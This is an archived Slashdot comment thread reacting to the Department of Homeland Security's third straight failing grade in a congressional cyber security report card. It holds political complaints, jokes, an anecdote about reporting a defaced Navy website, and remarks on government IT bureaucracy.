Slashdot Mirror
DHS Gets Another "F" In Cyber Security
An anonymous reader writes "For the third straight year, the Department of Homeland Security -- which is charged with charting the federal government's cyber security agenda -- earned a grade of "F" for computer security from a key congressional oversight committee, according to a story at Washingtonpost.com. Not only did the overall government-wide computer security grade remain flat (at a barely-passing "D+" but several agencies -- mostly those on the "front lines in the war on terror" -- actually managed to fare worse this year."
There's lots of blowback at work here, and it's on purpose!
...they're too busy ensuring the security of US citizens to worry about minor details like ... the security of US citizens.
Considering that the findings are given back to the relevant departments to improve upon, going backwards requires that not only are services added but that their security efforts don't even improve or get worse with the new projects.
Perhaps the demands of IT in these departments have increased significantly to account for these services. Anyone know?
__
Funny Adult Videos @ Laugh DAILY
But, such a thing can't be possible, surely?
-jcr
The only title of honor that a tyrant can grant is "Enemy of the State."
With all the incompetence being displayed in my government's administration, I many times wonder whether I live in a developed country. Should the meaning of "developed country" be re-defined? Remember, nothing seems to get done right in these United States of America these days.
Well then, time to deface some .gov websites with drawings of the prophet Muhammed...
Cracking child porno is much more important than these trivial issues. Why care when everything is available at/from google.
They called me mad, and I called them mad, and damn them, they outvoted me. -Nathaniel Lee
At one office that I worked in, we made regular trips to the agency's excess equipment warehouse to scrounge for parts that we used to build "new" (newer) computers. That was the only way that we could obtain computing hardware. There was no money in the budget for PCs, even though we were a software development group. We provided our own hardware and software support, by necessity.
Mea navis aericumbens anguillis abundat
It figures. Institutions like the DHS are completely focused on administrative, paper-tiger, security. Which in the end doesn't end up in a real security for anyone, but instead a freedom-diminishing administrative load on everyone.
The National Science Foundation and the General Services Administration each saw their scores rise from a C-plus in 2004 to an A last year. The Environmental Protection Agency and the Department of Labor earned A-plus grades in 2005, up from B and B-minus respectively.
Good to see there are competent people out there, it should not be impossible. It's just sad that the more 'safety-critical' the organization is, the more sloppy they get on critical points in their organization.
molmod.com - computing tips from a molecular modeling
the "environmental protection agency", which uses linux, got a "grade A"!
The departments are just waiting to be comprehensively attacked by some knuckleheads, so that their military industry sponsors can make money on further upgrading the war machine.
Stop the brainwash
Perhaps they are purposely performing badly so they can get more funding?
http://www.livejournal.com/users/metricmusic
I suspect these people are accountable to nobody, least of all the people. So what's with the infantile school grading?
B minus? D minus? Who cares. It's not like these institutions are going to go home and blub because they got bad school grades. Another propaganda stunt to make you believe your incompetent and unaccountable institutions are actually answerable to anybody imho.
prayer based security?
Being bitter is drinking poison and hoping someone else will die
JOSHUA
If you believe in the principle that government should have more to fear from the people than the people have to fear from government then this is probably good news as it's difficult to fear incompetence.
..other than the consequences of Bush's actions in the mid east. If the country was under a legitimate threat, then a lot of funding would go into many processes.. Bush is simply artificially exacerbating the threat by stepping on an ant's nest. Why ? they are far from stupid. This keeps them in power, and to the masses justifies their actions. Iraq was terrorist free, now it is creating 100s every day. It is this artificially created threat that is BUSH's masterplan,
money well spent ! go america !
"Freedom and Justice for All" is a registered trademark of The United States Govt Inc. Not available in all areas.
tsk tsk, mr DHS examiner.
don't you know that giving out grades to kids doesn't make
them ready for the reeealll world....
DHS got in trouble for using taxpayer money to buy lawnmowers and having lawnmower races. What a waste of our tax money. They're probably slack on fixing their computer security so that they can ask the president for more tax payer money and he'll probably say yes, and then they'll go spend some more money buying more lawnmowers for more lawnmower races. What kinda homeland security is this?
Criticizing DHS can be seen as being unpatriotic.
Free Software: Like love, it grows best when given away.
Maybe they outsourced their IT-department to India?
We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
You know, DHS has many sub-organizations within it. There are different groups responsible for IT Security within the different organizations and there is nothing that says "You will do this..." because there are different requirements for each location. When you say that there is no security, are you talking about a network that is intentionally exposed to facilite ease of use for particular tasks or one that is harboring vital information? Are you knocking the techs for the network being vunerable or the users for writing down passwords on post-it notes? A Congressional Oversight committe says that security is lacking? Half of them don't even know how to get into their own calendars, and get up at arms if they can't get to thier AOL e-mail from the office. They have no idea what it takes to give them what they demand, all they care about is papers that say that it has to be locked down. How many of you techs work in an enviornment where you can't download drivers from an FTP site without approval and access to a specific machine that is locked down? A 2 min download takes a day to get signed off on. It may not be like this in all of DHS, but, I can tell you that there are locations where someone needs to do a review to relax the existing level of security to allow people to do some work. This whole issue is B.S. in my eyes. The only way to make a passing grade based on government standards is to kick out all of the users and build a token-ring that's not connected to the outside world.
Perhaps they spent all their IT resources wiretapping US citizens to worry about their own networks.
We had elected Al Gore. I hear he invented the internet. We'd be in much better shape then.
GETPKG - Package Management for Slackware
I wish I could say I'm surprised, but, honestly? Not so much. It just fits in with the overall record.
What I'd really like to know is how much money goes into system security. Most likely an amount that should turn their system into something that puts Fort Knox to shame.
If it were political incompetence that would put the blame on us.
In any organization (including a nation), there is a "rule of 2": someone must be twice removed from you to be a good scapegoat. Otherwise you're still associated with whatever the screwup was.
Post may contain irony: discontinue use if experiencing mood swings, nausea or elevated blood pressure.
What if the government put out a bid for someone to undertake cyber attacks against them as well as provide funding for the repair/protection of these systems?
Offer, say, $1M to an organization to start cyber attacks on a specified date. These agencies would know full well that such an attack was coming. Do *YOU* want to be the one to try and explain why *YOUR* system was able to be broken into? Just as there was a huge effort to counterract the Y2K "bug", and we survived it relatively unscathed, I'm thinking a scheduled attack would do wonders in getting things secured, ASAP.
We could have nearly impenetrable systems by year's end.
Who on a Congressional Oversight Committee is qualified to comment on someone else's computer security?
Seriously, WHO?! I want names and bios/resumes of specific individuals relative to how they're qualified to comment on anything in this area or field.
I agree with some of the comments about too much paperwork and too little actual work. Of course, it's Governement Contractors (I B one) that are doing the work -- more paperwork == more money.
I work on some enterprise-level software (complete with login and secure information) for DHS. We had to get security clearance to work with their data. But then they decided that they wanted us to host it. Without SSL/encryption.
that si classified.. ;P
whilst Linux is undoubtedly good, I used it for my MSCE exams and got a "Grade F". Using Linux is not a guaranteed method of getting an "A".
I'm looking over the wall; and the're looking at me!
shouldn't that be: from the heckuva-job-team dept. ?
The IRS is the one organization that you don't want to fuck with. Remember, these are the guys who took down Al Capone.
This is to be expected. After all, when the feds are so busy watching us, how can we expect them to take care of themselves? Same goes for their network security. If they're so goddamn busy cracking into our E-mails and our home and corporate networks, they can't possibly be expected to secure their own, can they?
All of this, after they discover China's been operating a massive hacking campaign over here in the United States. You have to wonder if they're not just trying to screw up.
Would you mind telling us the hosting site's name? We'd like to install our password sniffers early. Or should we just monitor the FTP sites instead?
which is a fairly accurate portrait of organizational incompetence, or would be if the cardinals were a bit more apathetic.
I think, as a rule, governments can effectively only do one hard thing at a time. By "Hard" I mean something that in a organizational sense is like computational "hardness": you can't really do a perfect job of it, and you can exhaust all your resources trying to. You can walk and chew gum at the same time because both things are routine and use well trained motor programs. But if I gave you a marionnette, you could probably get it to walk or chew gum, but not both at the same time until by practice you managed to combine the two into a single action.
Governments can run a national park system and regulate food additives at the same time, because these are routine things like walking, well, walking and chewing gum. But organizating DHS at the time we did was, in my opinion, a bit of disasterous overconfidence.
DHS was established in January 2003, at the same time the administration was planning an invasion of Iraq in March. Homeland security is a "hard" problem. War and nation building -- in fact region building, are also "hard" problems. The only way you can do this is to find some way to combine the two into a single priority. The administration has done this rhetorically -- e.g. the well known "mushroom cloud" threat -- but on a practical day to day basis these efforts are completely separate. DHS so far as I know doesn't have anything to say about is happening in Iraq, and neither does the Iraq effort consider things like infrastructure security. The only point of contact between the two I can see is that they'd both like to have more of the Coast Guard's bandwidth.
Post may contain irony: discontinue use if experiencing mood swings, nausea or elevated blood pressure.
I know lets name it the Central Intelligence Agency. Wait we already have such an agency. We should disseminate the other operations that the CIA currently manages to appropriate agencies. Foreign clandestine operations go to the state department...etc. Obviously we would have to maintain security standards across agencies. If the CIA has the mandate they can set standards. If we had one agency that mandated data storage, security and dissemination across government branches we may have been able to foil 911 with a simple data mining operation. As someone who supports a local Police Department we would be more than willing to have some of the more difficult technical requirements for data storage mandated.
"I myself am made entirely of flaws, stitched together with good intentions."
So, a friend who will remain unnamed, and works for an unnamed contractor called me one day a few months ago and asked me to scope out a ( unnamed ) Navy website. He said he saw something suspicious -- looking like a subtle defacement by a 3rd party. So, I went there and took a look and yes, in fact, there was a *tiny* javascript insertion in the page calling a javascript file from some random IP. I tracked it down -- several indirections later -- to a chinese website which was causing the insertion of an active x control. It was all very obfuscated and suspicious.
So, my friend contacts the webmaster of the navy site and explains what he saw, how it was tracked down ( he left my name out -- thank god -- since my name is very islamic and happens to be shared with an at-large eastern european islamic terrorist. Bad enough that it's a disaster whenever I *try* to fly. Thanks, dad. ) and what did my friend get in return? Thanks? A "We'll look into that, good job, citizen". No, he was accused of hacking the site, and they informed the secret service of him and his "actions".
Fortunately, the SS ( lol ) realized he'd done the right thing and was innocent.
But, seriously folks, how fucked up is this?
lorem ipsum, dolor sit amet
all of you are talking out of your collective asses the ones that got good grades were the smallest agencies! The tactics used to check security within all of the departments is quite intensive and always from the inside with access to almost anything they want! In larger departments that are spread all over the country its very difficult to get an "A". my .0000000000001 cents worth
Your friend is a stupid fuck.
Didn't learn at an early age that you don't dare tell the emperor that he's naked or you'll get your head chopped off.
The House Government Reform committee does some investigation and gives an agency a poor grade.
The Secretary for the agency gets grilled by Congress-critters on why their agency is failing, again. The Secretary doesn't really care about IT security, but (s)he does care about not getting grilled by Congress-critters.
The secretary authorizes some obscene amount of dollars to go towards "improving IT security" and signs off on some plans that purport to do this. Often these are bundled together with initiatives for IT centralization, better management practices, the yearly re-org plan, etc. If you're lucky, some fair portion of the obscene dollar amount actually goes towards something that might really help IT security.
Various political appointees (Deputy Secretaries, Assistant Deputy Secretaries, Associate Deputy Assistant Secretaries, etc.) get shuffled around in the post-Congressional-snitfit era and engage in vicious political battles that make Imperial ascension politics in the Roman Empire look like a shuffleboard tournament. This of course immensely helps the prospects of improving IT security.
Meanwhile, various Beltway contractors propose all sorts of interesting things the agency can do with the money. The ones who are already working with the agency make recommendations to steer the dollars towards projects they can successfully bid on and ways they can increase their headcount, and the outsiders try to weasel their way in. Vendors make extravagent promises about their gear and generously distribute dinners, trips, tickets and job offers in desperate attempts to land a multi-million dollar sale.
Somebody (no one ever admits to this later) actually buys off on some subset of these promises and signs a PO to Make This Happen.
The money eventually filters down to the GS-15s and 14s (career employees) and contractors who Actually Do Something instead of going to meetings all day and answering email. They often emulate the successful political appointees above them by holding lots of meetings and sending lots of email. However, they get to Actually Do Something as well. Lucky them.
Some random collection of program managers, unwitting new subcontractor hires, and government support employees are thrown together to Make This Work. If they're lucky, enough of the people on the task have worked together before to know how to navigate through the bureaucratic, corporate and technical obstacles to have something to show for their efforts after 6 months. If not, well, the government paid for Yet Another Jobs Program.
3 times out of 10, the proposed solution fails so miserably that they can't even convince the other contractors and govvies to put it into production.
6 times out of 10, it works just well enough to shoehorn the "solution" into production, as long as the duct tape holds and they can hire enough bodies for the Mongolian Horde approach to IT ("quick, get more people for the overnight shift, the ticket count's escalating again!"). But that's okay, 'cause the same contractors and govvies will get to fix it again next year when the problem still isn't solved.
1 time out of 10, they actually Make It Work. Wow. People stumble around in shock, awe and amazement at what they have created. Users are happy, management is off their backs. But don't worry. Something will change in another 6 months to bring completely new requirements into the picture, and you get to roll the dice again.
"We can categorically state that we have not released man-eating badgers into the area." - Major Mike Shearer, UK
If the 9/11/2001 planebombs (including direct hit on the Pentagon) and the ever-increasing terrorism rate since we invaded Iraq aren't enough for Bush to get even a passing grade in Homeland Security, he never will. Even the Katrina flood disaster, in which an entire American city was destroyed while Homeland Security's FEMA agency flailed, wasn't enough to get their asses in gear. Meanwhile, that vast catastophic failure of DHS is used to justify spying on Americans. Including spying on completely peaceful pacifists, just because they peacefully oppose Bush's war policies.
We have never been weaker or more unsafe. Our union is divided everywhere, persecuted by our government, churning our experienced national security personnel (including our military) into a useless, expensive albatross around our neck. If someone actually attacked us, we'd be worse off than before we got all these "warnings", many of which are already killing thousands of Americans.
These clowns have got to go.
--
make install -not war
I know, it's so easy (and fun!) to slam the gov't when they mess up. Lately, they seem to be messing up an awful lot (which translates into an awful lot of fun for folks like me!).
Only a few agencies improved and those agencies aren't even as significantly correlated to security as the likes of DHS, etc.
It feels a lot like hypocrisy to me, when the gov't continuously appears to be able to fail and get away with it but we normal, everyday citizens cannot "officially" get away with much at all.
I wish there was some undiscovered land to be found because I feel the spirit of Christopher Columbus wanting to escape all this seemingly irreparable beaurocracy and start anew elsewhere.
Richard (aka Merwyck, aka QuaDZeRo) I blog at http://richardharlos.com
...I wanted to reiterate that this is ONLY based on Federal Information Security Management Act (FISMA) reporting. Essentially, FISMA reporting is a basic assessment of system vulnerabilities and policies/procedures. Additionally, reporting is inaccurate, as the system being evaluated must be in the DHS systems inventory -- most systems are not because DHS has a poor inventory. Therefore, most systems are not even evaluated.
So, if this "report card" were properly reported, more systems would be in the population (and sample, since I feel sample size is too low). And if better, more in-depth security assessments were done, DHS would probably do even worse. I just wanted to give you the warm fuzzies...
Anyhow, people the under the CISO (Bob West) are working to get a better inventory and to improve FISMA reporting, but the processes are painfully slow due to growing pains, political battles and the typical laziness that consumes government workers.
We should get some more guys from the casino and porn industries in here to whip system security into shape...seriously...
01100111 01100101 01110100 00100000 01101111 01110101 01110100 00100000 01101101 01101111 01110010 01100101 00101110
Why dont they just outsource it to another country, perhaps Arab?
...that DHS lacks security but gathers data....rather convientient for someone who breaks past the flimsy security and than gets the jackpot in US citizen data. Compiling data from previously private and secure places and than storing them in dangerously unprotected data centers is a treasure trove for any decent hacker. IMHO they should not have even begun "securing" America until there network was up to snuff, to do anything else is to undermine the security of your nation intentionally or stupidly, there isn't really much other option there.
sorry for harsh criticism of your countries security but it sounds like your taking cash out of Fort Knox and than keeping it in a cookie jar in a daycare centre while telling people your securing it further. i truly don't get it. are you trying to open your country for the world?
according to this story, which is a kind of "Greatest Hits" for DHS that will curl your toes.
(%i1) factor(777353);
(%o1) 777353
I don't know many GS-14's or -15's that actually do anything...and I've met a LOT.
The government needs to eliminate this bullshit job security and make people work for a living. If people don't work and meet performance standards, they should get fired.
But no, that's much too logical. Instead, we allow people to put in a good couple years when they're young (and want to work) and then support them through the rest of their life while they slack off and can't be fired. Most people need some sort of fear for their job or they won't work. It's as if every government worker past three years has won the lottery -- at least 50k/year for the rest of their life for doing nothing. Shit, I should stop contracting...
01100111 01100101 01110100 00100000 01101111 01110101 01110100 00100000 01101101 01101111 01110010 01100101 00101110
OpenBSD has announced it will sidestep the patent on praying by starting work on its own "OpenPrayer" firewall.
Everyone knows that the government's attempts to ensure some sort of national computer security are going to suck. It is almost a forgone conclusion.
Basicly, everyone knows that government sucks... the only difference is that some people think the government sucking is pretty much inevitable, and want to avoid more government. Where as other people believe that the only reason the government sucks, is because we don't give them enough resources (in the U.S. we give over 50% of GDP to governments, so maybe we need to give the government 75% or 100% of GDP to do a good job).
I have no way of knowing if this is true or not. Even so, if someone does find such a thing, you report everything *ANONYMOUSLY*
And if they don't take action, you drop it on Bugtraq/send it to the media (again, anonymously--use a remailer if necessary). Even if they're too clueless to fix it, the media attention will get them moving.
I had entirely too much access to certain files at a state university once. In theory, I could have ended up expelled, etc. for that, which is ridiculous. Instead, I promptly reported the vulnerability I had found, stayed anonymous, and saw that they fixed it. I didn't get in any trouble because I didn't allow for that.
One wonders how they manage to keep failing at this. I mean, it's the DHS. You'd think they'd be on top of this kind of thing.
Then one wonders, what if they really are? I mean, it's the DHS. A tempting target for any terrorist hackers. What if they're really more secure than they've made themselves out to be? Could it be that the DHS network is just a giant honeypot?
You have to admit, it would be an interesting idea, and not exactly stupid. But then again, this goverment isn't on the ball as far as "not stupid" is concerned, are they?
Tluin natha Linux xxizzuss uriu olt bwael mon'tun.
Netcraft confirms it! BSD has risen from the dead! The Kingdom is at hand! The geeks shall inherit the earth!
It's not offtopic, dumbass. It's orthogonal.
When I was last in exams, for work not for trivial stuff like degrees, passing grade was C, like it had been all my life. Less than half marks, no pass. KISS.
Birds are not dinosaur descendants;birds are dinosaurs, for all useful meanings of "birds", "are" and "dinosaurs"
Sounds like the exact same issue large corporations have. They spend so much time documenting processes and engaging procedures around those processes, no one does the actual work. What's worse is the reason they do all this documentation is so that anyone, regardless of skill level, can perform the job. Anyone in IT knows it takes a great deal more than "reading the instructions" to implement almost anything related to a computer.
I'm definitely not surprised. Our government for years has set a bad example that most U.S. companies gladly emulate: poor practice, no implementation, legal protection, excessive documentation, falsifying accounting, overspending the budget, overpaying the executives, underpaying the workers and getting no real work done.
Imagine how admired our government would be if they worked like a small business: small group of executive voices say to do it; fairly paid, valued workers do it; it gets done; customers are happy; repeat business ensues.